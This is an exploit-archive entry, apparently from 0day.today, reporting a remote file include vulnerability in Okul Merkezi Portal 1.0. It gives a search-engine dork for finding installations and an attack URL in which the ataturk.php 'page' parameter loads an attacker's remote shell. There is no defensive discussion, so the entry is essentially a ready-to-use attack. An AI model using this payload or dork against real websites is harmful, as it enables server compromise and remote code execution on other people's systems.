id: 1320
date: 12/25/2006
title: Okul Merkezi Portal 1.0 (ataturk.php) Remote File Include Vulnerability
author: ShaFuck31
cves: 

=======================================================================
Okul Merkezi Portal 1.0 (ataturk.php) Remote File Include Vulnerability
=======================================================================




# script name : Okul Merkezi Portal v1.0

# GoogLe Dork : ogrencimezunlar.php

# Script Download : http://www.okulmerkezi.com/omdemo/

# Risk : High

# Found By : ShaFuck31

# Thanks : | Dekolax | The R?D | DesquneR | f1r3b0y | BaZaL | SaboTaqe | ST@ReXT | BLaSTER | UNiKnoX |

# Vulnerable file : ataturk.php

#Vuln :
http://www.victim.com/ScriptPath/ataturk.php?page=[sheLL]

#Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed]




#  0day.today [2023-03-22]  #